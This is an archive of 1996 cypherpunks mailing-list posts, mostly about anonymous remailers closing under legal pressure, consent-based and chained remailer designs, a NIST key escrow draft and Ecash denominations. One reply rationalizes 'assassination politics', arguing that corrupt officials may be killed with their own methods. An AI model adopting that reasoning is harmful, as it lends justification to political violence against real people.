Date: Wed, 22 May 1996 10:07:53 +0800
To: remailer-operators@c2.org
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <Pine.GUL.3.93.960520223851.489X-100000@Networking.Stanford.EDU>
Message-ID: <Pine.A32.3.93.960521152031.52974B-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


After pondering a bit it seems to me that the "knock knock" remailer
approach (only send anon-mail if the recipient agrees to receive it) could
be made feasable pretty easily.

Rather than hold the mail while waiting for a consent to release, you
could simply encrypt the peice of mail with a symetric algorythm on its
final hop, and send the encrypted mail to the recipient. 

At this point there are 2 options, which I havnt examined closely: The
first is that you require them to send a request for their "consent-code"
which can be used to decrypt the mail. Under this arrangment you could
possibly provide for a user to specify a specific consent code, so that 2
party's who had previously agreed to communicate could avoid "knocking".
If you strip the subject, then it would be all but impossible for a person
to include the consent code in the actual peice of mail.

The second is to simply include the
consent-code along with the encrypted peice of mail and a legal notice
stating that decryption of the mail constitutes your consent to receive
the mail, as well as your agreement to hold the remailer-operator harmless
should the mail be found to be in some way offensive. Further, the
recipient would agree to be solely liable for the contents of the mail,
etc etc.. I leave the actual agreement to the net.lawyers to figure out.

As far as I can tell an agreement of this form would be at least as valid
as the software licenses ("NOTICE: Opening this envelope constitutes your
agreement to the terms.. blah blah blah") that are commonly used today.
Also would seem to be a similar concept to "Opening the case of this
device void's your warranty" stickers on appliances.

Under this approach persons would receive mail whether they'd consented or
not (unless they requested to be blocked). But it would be difficult for
anyone to raise any serious legal issues about something they havnt read,
and impossible for them to make noise about what they read, after the
implied consent they gave when decrypting.

Under both approaches it would be wise to have a list of addresses who've
already consented, which would contain all of the known remailers..
whether or not an operator chose to have names besides remailers in the
list would be at his/her discretion.

Ben..







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 13:21:43 +0800
To: Lance Cottrell <loki@obscura.com>
Subject: Re: The Crisis with Remailers
Message-ID: <adc79587230210047e33@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:02 PM 5/21/96, Lance Cottrell wrote:

>> This discussion belongs on the list, not in private e-mail.
>
>Oops, I must have hit the wrong key. I ment to have a copy go to the list.
>

Oops again, Lance, for you, as you posted my private response to you publically!

No harm done, but my "this discussion belongs on the list" was an
indication of why I was being very terse in my comments. (I take more time
when I know a bunch of people are reading my stuff than when I am just
talking to one person, and when we may have some private shorthand
comments.)

So, everyone, please ignore everything Lance quoted of mine in his message
and wait for the comments I will make to the list as a whole. (Or don't, as
the shelf life of threads really does match the "thread du jour" name some
of us use.)

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Wed, 22 May 1996 04:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <Pine.3.89.9605211529.A26742-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Rich Graves wrote:

> On Tue, 21 May 1996, Declan B. McCullagh wrote:
> I like the "knock-knock" approach, though it would of necessity impose
> load. If someone has an anonymous message waiting, send them a simple note
> with instructions on how to retrieve it.

I have a partial implementation of this for Mixmaster if anyone wants to
try integrating it into the main code. It works (or worked) for single
packet messages but I never finished the multi-packet code. Of course, if
Mixmaster is being rewritten anyway then it won't be much use. 

AFAIR it also relies on the 'In-Reply-To:' field in the header working 
correctly.

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 22 May 1996 05:30:31 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: NIST Draft Key Escrow Paper
Message-ID: <199605211555.PAA28564@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've just heard back from Ed Roback of NIST that he'll fax us a copy of
the Draft Key Escrow Paper, which we'll scan and send to Pat Farrell for
his Web site. I'll ask Pat to announce it's availability when ready.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 22 May 1996 13:39:23 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <199605201934.MAA28228@netcom20.netcom.com>
Message-ID: <Pine.LNX.3.93.960521154610.587B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Vladimir Z. Nuri wrote:

> the assassination politics is quite Hitleresque at its root.
> "kill our enemies, and everything will be better. it is our enemies
> that are the root of all evil in the world. extinguish them, and
> you solve all problems automatically"
	
	It is more the MAD theory brought down to the personal level. The
government has the power and authority to kill anyone of us, AP brings out
into the open the fact that WE ALL HAVE THAT POWER. KIlling people is
(physically) very easy, AP turns the THREAT back on those who hold the
power. Note: I don't necessarily think that AP is a good idea. I think
that people should do their own dirty work.

> such is the total moral perversion of the thinking behind 
> "assassination politics". most of the adherents work from the 
> following argument, nicely summarized by JFA above:
> 
> 1. the government is corrupt
> 
> 2. therefore, it is okay to kill people who further that corruption.
> 
> wow, what brilliant logic. I must admit it proves to be superior to
> that embodied by any second grader, a high accomplishment for its
> proponents.

	How about this:

	Goverments, and the people in them are corrupt. This corruption,
caused by acts of these people, lead to oppression and death. By THEIR
MORALITY oppression and killing are ok, so it is ok to use their tools
agaisnt them.

> there is a trite saying, "two wrongs do not make a right" (trite
> because most have mastered the simple truth of it in their pre-teen
> years). a concept not grasped by some second-graders. some 
> require a lifetime of lessons to comprehend it in the end..

	Putting people in cages is wrong.
	Stealing is wrong.
	Is putting people in cages for stealing wrong?

> carefully the errors of those who have come before you. write
> a long treatise with lots of footnotes to past assassination
> difficulties and how you would advance past them. I tell
> you flat out that any respectable assassin would be quite embarrassed
> to be associated with you at the moment because of your arrogance
> and ignorance.

	I might be wrong here, but I don't think that Mr. Bell actually
wants anyone actually shot, well, maybe he does, but what he wants is to
have the same power over members of governments than they have over him.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Quinby <jquinby@fivepaces.com>
Date: Wed, 22 May 1996 10:06:02 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer extensions
Message-ID: <2.2.32.19960521195600.006f300c@mailhost>
MIME-Version: 1.0
Content-Type: text/plain


>At 09:17 AM 5/21/96 -0500, you wrote:
>>
>>Hi all,
>>
>>In pondering the last few days of discussion it occurs to me that a test
>>might be possible. In short:
>>
>>Is it legal for a business to anonymously remail physical mail?
>>
>>The process I propose is as follows:
>>
>>1.   Some party mails an envelope to 'Remailers-R-Us'.
>>
>>2.   Inside that envelope is the real mail addressed and stamped along
>>     with say a $1 money order for processing.
>>
>>3.   The people at Remailers-R-Us simply take the dollar and deposit it
>>     in the bank while depositing the letter they received in the local
>>     mail drop.

This is my first post to the list.

Aren't there mail drops already in operation that do just this? I seem to
recall that the only way to get QSL cards (non-radio folks bear with me)
from pirate SW stations was to go via their mail drops. The section of
Monitoring Times magazine that deals in pirate radio has a list of mail
drops used by the stations (or it used to, anyway). Seems like I saw them in
the classifieds of Rolling Stone or some such place.

-JQ



|<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>|
|James Quinby |  Atlanta, GA  | PADI/153KHz-896MHz/PGP262/EADBGE| Phl4:8-13|
|jquinby@fivepaces.com (work) | Own a 45 MPH couch potato:-                |
|jrq@ix.netcom.com     (home) | Adopt a greyhound today. Write for details.|
|<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>|
|Public key fingerprint: 9ACC4C28478018E1 372DC06A9452A477, MIT's keyserver| 
|*****Opinions expressed are mine. They are *not* those of my employer*****|
|<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>|








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Wed, 22 May 1996 03:15:01 +0800
To: ecash@digicash.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960521135644.00354324@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 15:34 1996-05-21 +0200, bryce@digicash.com wrote:
>Well how do we represent 0.01 U.S. Dollars in Mark Twain 
>Ecash(tm)?  Easy-- we take a few bits of data, interpret it as 
>an unsigned binary number, and then say "this number is how
>many U.S. pennies this coin is worth."

Now we're back to pennies again. I was more interested in your
earlier claim of tiny payments, on the order of $2^-32.

>Actually it can sometimes get more complicated than that, and 
>there are some details about how the forthcoming ecashlib 
>handles this to be found at "http://www.digicash.com/api".

Will the api make it possible to create coins of arbitrary value? Is
the mint software (and the bank accountants) capable of doing
floating point arithmetic?

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 13:55:56 +0800
To: cypherpunks@toad.com
Subject: NSA's Dual Missions
Message-ID: <adc7975c24021004ec55@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 5/21/96, jim bell wrote:

>Yes...but...   How can the NSA serve two masters?  If the NSA has the
>American public's best interests at heart, then it should have revealed the
>flaw if it knew of it. (Otherwise, it can't be trusted...)

Reminder: the NSA ostensibly has dual missions.

First, the gathering of signals and communications intelligence.

Second, the securing of American signals and communcations.

This second mission is primarily military, diplomatic, and other
governmental communications, but has also been extended to assisting in the
securing of commercial communications.

NSA's (and its daughter org, the NCSC's) involvement in DES fits in here.

Some years back there was the "Commercial COMSEC Endorsement" program.

Anyway, Bamford describes the dual missions, albeit for the world of 1982
and earlier.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Wed, 22 May 1996 04:44:54 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <Pine.3.89.9605211502.A26742-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Timothy C. May wrote:

> Traffic analysis will be quite easy to do, of course, as all mail sent to
> the persistent address comes out of the "disposable@foo.com" address.
> Q.E.D.

Yeah, but the attack model I was assuming was lawyers rather than
intelligence agencies. The NSA could probably easily link the two
together, but the Church of Foobar(tm) probably couldn't. They'd only have
access to the logs on the ISP and the information you gave when you signed
up, not the raw packets on the Net. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Wed, 22 May 1996 04:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: MixMaster fair use
Message-ID: <Pine.3.89.9605211602.A26742-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 21 May 1996, Jim Choate wrote:

> What confuses me is the part above that states that I agree to use Mixmaster
> for solely non-commercial use. This is NOT GNU or copyleft.

Isn't that because it uses RSAREF? AFAIR the RSAREF license says you can't
use any RSAREF applications commercially without paying license fees. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 14:02:54 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <adc79983250210046dc4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 PM 5/21/96, David E. Smith wrote:

>Unless Alice will automatically rotate between some random set
>of Bob1, Bob2, Bob3... It also wouldn't be too difficult
>to set up a message that goes through several points before
>emerging at a randomly-chosen exitpoint, including a
>completely independent remailer.

Sure, Alice can always herself add remailer steps. I explicitly mentioned
this in my  message last night, when I wrote: "(Hal, to use him as the
example, could start using his own choice of remailer hops to accomplish
much the same result. We've talked about this for a long time, too...."

But this is just using more remailers. We know this works. What Mark Grant
was suggesting was something different, a kind of "disposable final
emanation point," designed to go away easily under legal pressures.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 22 May 1996 14:23:28 +0800
To: cypherpunks@toad.com
Subject: The Twilight of the Remailers?
Message-ID: <adc79abe26021004b7e9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:59 PM 5/21/96, Alex Strasheim wrote:
>I'm closing my mixmaster, nsa@omaha.com, on the 4th of June.
>
>There wasn't an incident that triggered this, but Hal's post about the FBI
>sort of spooked me, as have the lawsuits.  I don't have a lot of assets
>myself, but I do have partners.  My lawyer tells me that there's no
>reliable way to separate my personal net activities from those of the
>company my parnters and I own, and that I could even be exposing my
>parnters to personal liability.
>
>I can't speak for anyone else, but for me the problem with running a
>remailer is that it's an inherently altruistic enterprise.  That in itself
>wouldn't be so bad, but the liability makes the extent of the altruism
>open ended.  If I knew that the worst case scenario would be $1k or even a
>$5k personal loss I could do it, but an open ended liability that's shared
>by my partners is unacceptable.
>
>I'm sorry for the inconvenience this will cause.

Between Hacktic going down, Hal's comments that he may shut down his two
sites, and this, plus others who are more quietly making plans to shut
down, I think the thread title "The Remailer Crisis" is more apt than ever.

As to potential liability, it is very likely to be vastly more than the
examples Alex cites, of $1K or "even a $5k personal loss." Lawyers don't
get out of bed in the morning for such insignificant sums.

Keith Henson has been a friend of mine for the past dozen years (and I
actually met him first in 1976), and he has kept me informed of his fight
with the CoS. He's being sued for $100,000 by the CoS. (And they asked him
a lot of questions about remailers, and who runs them. He didn't tell them
much.)

I can't say whether they are likely to win their suit, or what the judgment
might be. But make no mistake about it, if the CoS wins and Keith is
ordered to pay....

It's one reason I won't run a remailer that can ever be traced back to me.
(I also don't have a box on the Net and don't really trust running
remailers on machines someone else has root to. And I'm not a Unix person.
And....)

I figure that there are some, such as Detweiler, maybe government types,
maybe others, who would make efforts to "take me down." Posting some child
porn through my site to a Usenet group and then alerting the media would
pretty much do it. (Or if binaries are not allowed, posting solicitations.
Or if Usenet posting is not allowed...well, there are still ways...)

"The Twilight of the Remailers"?

Ironically, "copyright violation" and "clam secrets" were not even on the
list of "the Four Horsemen of the Infocalypse" that we thought would really
put remailers under some extreme pressure. If the Scienotologists can shut
down many of the remailers, imagine what the Horsemen will do!

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 22 May 1996 13:14:13 +0800
To: cypherpunks@toad.com
Subject: Re: Long-Lived Remailers
Message-ID: <199605212328.QAA03415@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:29 AM 5/21/96 -0700, Timothy C. May wrote:
>At 3:00 PM 5/21/96, Rev. Mark Grant, ULC wrote:

>>Yeah, but the attack model I was assuming was lawyers rather than
>>intelligence agencies. The NSA could probably easily link the two
>>together, but the Church of Foobar(tm) probably couldn't. They'd only have
>>access to the logs on the ISP and the information you gave when you signed
>>up, not the raw packets on the Net.
>
>The traffic analysis on this fixed mapping system needs no access to
>packets and is childishly simple.
>
>Let's call the first site "Alice" and the emanation site "Bob."
>
>That is, all messages sent to the persistent site Alice appear to come from
>the site Bob.
>
>The Church of Clams can simply send messages addressed to themselves
>through the Alice remailer and see immediately that they appear to come
>from Bob.

Tim, I think you missed his (and my) point.  The purpose of such a split is 
not to disguise the link between Alice and Bob; the point is to prevent 
legal attacks on the remailer by putting the transmission part (Bob) in a 
country which is hard to reach.  Logically, an attacker could easily 
determine that sending a message to Alice would have it come back from Bob, 
but the converse would not be true:  A message which came from Bob would not 
necessarily have come from Alice.  Besides, any legal attack would require a 
substantial investment that would make harassment suits pointless.  Add to 
this the fact that "Bob" might only last a few weeks...

An organization like COS would be faced with no good target.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 22 May 1996 13:33:24 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns (fwd)
In-Reply-To: <199605202328.SAA14914@einstein.ssz.com>
Message-ID: <Pine.LNX.3.93.960521163452.587D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Jim Choate wrote:
> Forwarded message:
> > Date: Mon, 20 May 1996 15:02:08 -0700
> > From: Hal <hfinney@shell.portal.com>
> > Subject: An alternative to remailer shutdowns
> > was apparently sent through my remailer.  According to 18 USC 875(c),
> > "Whoever transmits in interstate commerce any communication containing
> > any threat to kidnap any person or any threat to injure the person of
> > another, shall be fined not more than $1,000 or imprisoned not more
> > than five years, or both."  I may not be able to continue operating
> > either of my remailers (alumni.caltech.edu and shell.portal.com) for
> > much longer due to this kind of abuse.
> 
> There should be a section in there dealing with 'knowingly'. If not then we
> should immediately bring charges against any and all newspapers who have
> ever printer a ransom letter, or perhaps even the Unibomber Manifesto since
> there is clear evidence of 'threat to injure the person of another'.

	And the postoffice for transmitting both his bombs, and his
manifesto, and the phone company for all of the times they have
transmitted threats interstate &etc.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Wed, 22 May 1996 11:10:01 +0800
To: cypherpunks@toad.com
Subject: Re: NIST Draft Key Escrow Paper
In-Reply-To: <v01510106adc7a066e00a@[204.62.128.229]>
Message-ID: <glcWh1m00YUzEQB3Av@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 21-May-96 Re: NIST Draft Key Escrow
P.. by Declan McCullagh@well.co 
> OMB publications at the number below says: "We're just finding out about
> the report. We're not sure if they're going to give us copies or not."

I have it on *very* good authority :) that EPIC will have the draft
white paper on their web site by this evening.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 22 May 1996 11:11:37 +0800
To: jya@pipeline.com (John Young)
Subject: Re: NIST Draft Key Escrow Paper
Message-ID: <v0151010aadc7eace5b3c@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


>We've just heard back from Ed Roback of NIST that he'll fax us a copy of
>the Draft Key Escrow Paper, which we'll scan and send to Pat Farrell for
>his Web site. I'll ask Pat to announce it's availability when ready.

To follow up:

I think EPIC is putting last week's draft online, not this week's.

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 22 May 1996 14:20:02 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FA
In-Reply-To: <199605210104.UAA27801@cdale1.midwest.net>
Message-ID: <Pine.LNX.3.93.960521171152.792B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, David E. Smith wrote:

> > 	I realize that this would be a civil case rather than a criminal
> > one, maybe it would have to be child porn or something illegal to get that
> > far, but if I were to set up a remailer under my real name, and the CO$
> > wifes approval for this, and I don't want to expose Suba to any liability
> > in this. (So relax Alex).
> 
> If you don't get the necessary approvals for that, I'd be

	I have approval to find out more information.

	NO, I GET TO BE THE MARTYR. 

> will at least get me away from my ex-girlfriend :)

	Sometimes it seems like it would be worth it.

> Lest you jump for that delete key now, I'm serious.

	We'll see.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Wed, 22 May 1996 13:24:20 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <9605212220.AA05507@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


Ben Holiday <ncognito@gate.net> wrote:
>
> After pondering a bit it seems to me that the "knock knock" remailer
> approach (only send anon-mail if the recipient agrees to receive it) could
> be made feasable pretty easily.
>
> Rather than hold the mail while waiting for a consent to release, you
> could simply encrypt the peice of mail with a symetric algorythm on its
> final hop, and send the encrypted mail to the recipient.
>
> At this point there are 2 options, which I havnt examined closely: The
> first is that you require them to send a request for their "consent-code"
> which can be used to decrypt the mail. Under this arrangment you could
> possibly provide for a user to specify a specific consent code, so that 2
> party's who had previously agreed to communicate could avoid "knocking".
> If you strip the subject, then it would be all but impossible for a person
> to include the consent code in the actual peice of mail.
 
This could be done with no "storage" as well, by a slightly
different method and still require end reciepient acknowledgement.
The end reciepient could be required to reply and include the encrypted
message. The remailer would then decrypt the message and send back the
plaintext.  Only storage would be the key vs. a message id database.
 
> The second is to simply include the
> consent-code along with the encrypted peice of mail and a legal notice
> stating that decryption of the mail constitutes your consent to receive
> the mail, as well as your agreement to hold the remailer-operator harmless
> should the mail be found to be in some way offensive. Further, the
> recipient would agree to be solely liable for the contents of the mail,
> etc etc.. I leave the actual agreement to the net.lawyers to figure out.
 
By reduction - you could just do a rot13 on the message and
append the "legal notice".   If all the information for decoding
a message is present in that message, is a different encoding
mechanism really any different from straight ASCII text?
(i.e. Netscape 9.13 might have auto decoding built it....)
Then, the user doesn't do anything "extra" - does this invalidate
the notice?
 
I might be wrong, but I don't think that this second method would
gain you anything in the 2 situations where operators will get
hassled.  1) Posting of copyrighted material - the lawyers will
at least harass you no matter what kind of legal notice is up front.
2) Mailing of "harassing" information - the person still gets
unwanted email, and has no way to stop it.
 
> [... legal ideas deleted ...]
 
Heaven forbid that I use spammers as an idea base, but
to borrow something from them.... Set up the headers
on an anonymous message such that a Reply would result in
the user automatically being placed on the "deny" list.
 
This means that only 1 message gets through.... but, as
Hal has noted, that might be 1 message too many.
 
Similarily, a message sent to the user could be the
"knock", and then a reply would automatically add the
user to the "allow" list as well as forward the
message.... just an automatination of the "knock" idea.
 
Dan
 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 22 May 1996 13:38:25 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Rumor: DSS Broken?
Message-ID: <9605212127.AA01697@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 21 May 96 at 10:39, jim bell wrote:

> It is at least arguable that the NSA might have a vested interest in
> allowing an enemy to continue to use a flawed encryption system, as
> in Enigma.

Is is arguable?  Maybe, but only if you specify the exact context. The
Enigma stuff happened when the world was as war, and the peoples that
would have used such things in the same context as DES is used now
were non-existent.

The case of covering-up knowledge of DES and Enigma are quite
different because happening in different *contexts* .

But maybe the govt is keeping the population in ignorance, not telling
them that a war *is* going on *now* ?

JFA
Some peoples believe that words have an intrinsic meaning outside of
their appropriate context.  You can usually find specimens of this
group either in political circles or in Voodoo ceremonies.




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMaH8NciycyXFit0NAQEIzAgAkDMyygi1ifl7ey580gvOMRreUnhbNUp4
vL19wWfvEtPr+svUMhV1px6TGDpJepdheqjyUwB3Qk4t0KHdEn0j35RviKznaD0X
bUKBamIVRbTNtgvmm0LOmdykeywtNgZmFx9tvKKwF6cQTZ8e4uqfYp8dqjCuIG8j
xmiJDoaDF9M5h40gCs95/DEwM3XX7O+FS7HSXBQ57vP4Y3N86OawTPe4Zx6Gxfeb
qCYiEp0R0/5XjbzGUCJQrct3kjq7t8l3mQwhUc/UktMK1DacVs2QqqgqYCVEVYMg
zfTg/5DdlBm+ozsomtnpByMsJ1kR3VZx8KeO9rX+SlZgNidE7hKSlw==
=v+6X
-----END PGP SIGNATURE-----

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 22 May 1996 13:53:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Long-Lived Remailers
Message-ID: <199605212215.RAA13102@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain



An NSA operative with the code name 'tcmay@got.net' wrote...
> Let's call the first site "Alice" and the emanation site "Bob."
> 
> That is, all messages sent to the persistent site Alice appear to come from
> the site Bob.
> 
> The Church of Clams can simply send messages addressed to themselves
> through the Alice remailer and see immediately that they appear to come
> from Bob.

Unless Alice will automatically rotate between some random set
of Bob1, Bob2, Bob3... It also wouldn't be too difficult
to set up a message that goes through several points before
emerging at a randomly-chosen exitpoint, including a
completely independent remailer.

Actually, there's an Idea.  Set up a single address; use added
headers in the style of:

::
Remailers-To-Chain: 7
Remailers-To-Avoid: remailer@nsa.gov
Final-Destination: tcmay@got.net

Each remailer could construct a message that decrements the
remailers counter, preserving the other headers.  The
usual caveat on encrypting at each step would apply; but since
remailers' pubkeys are available, that's a trivial concern.

A lot more could be done with this general concept.  One immediate
problem is that the frontend address is a target, even though
it can't be obviously connected to any objectionable messages.
Packet sniffing is always a concern, etc etc...

Flame away.

dave

----  David Smith  Box 324  Cape Girardeau MO USA  63702
http://www.prairienet.org/~dsmith  dsmith@prairienet.org
Reality is only for those lacking in true imagination...
Send mail w/'send pgp-key' in subject for PGP public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Wed, 22 May 1996 05:15:45 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960521135644.00354324@mail.pi.se>
Message-ID: <199605211544.RAA04042@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Matts Kallionieme <matts@pi.se>:
 (> > == Bryce <bryce@digicash.com>)
>
> >Actually it can sometimes get more complicated than that, and 
> >there are some details about how the forthcoming ecashlib 
> >handles this to be found at "http://www.digicash.com/api".
> 
> Will the api make it possible to create coins of arbitrary value? Is
> the mint software (and the bank accountants) capable of doing
> floating point arithmetic?


Matts, you don't want to do floating point for money, because
floating point doesn't give you good control of precision.  If
you want to know how it _is_ done, RTFAPI ("read the fantastic
API.")  Scan for "EC_Coinage".


Keep in mind that only Ecash(tm) Mints can create Ecash(tm) 
coins and choose what values the coins have.


I'm glad you are asking these questions.  Perhaps this will be
the start of the Ecash(tm) API FAQ.


Regards,

Bryce

(I'm getting tired of typing "(tm)".  I'm going to make a macro
that appends "(tm)" to every instance of "Ecash" as I type 
it...)

- -----BEGIN GOODTIMES VIRUS INNOCULATION-----
Copy me into your .sig for added protection!
- ----- END  GOODTIMES VIRUS INNOCULATION-----



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaHk8UjbHy8sKZitAQFWcwMAsIK/HDloWq9LslPcQd3R0h6tOx1sH6I0
Ngc8jkSBsDPVL28I0tvimHLfMInq9EEPoOvwUjFQ8cmKTeVJVSRyYDCyQVTSbfWa
2gA8mjBTcCw5QrEYQAP74Dg0Os+iSwB5
=K79Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 22 May 1996 13:10:50 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: An alternative to remailer shutdowns
In-Reply-To: <Pine.A32.3.93.960521152031.52974B-100000@hopi.gate.net>
Message-ID: <9605212257.AA00853@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Ben Holiday <ncognito@gate.net> writes:
>  As far as I can tell an agreement of this form would be at
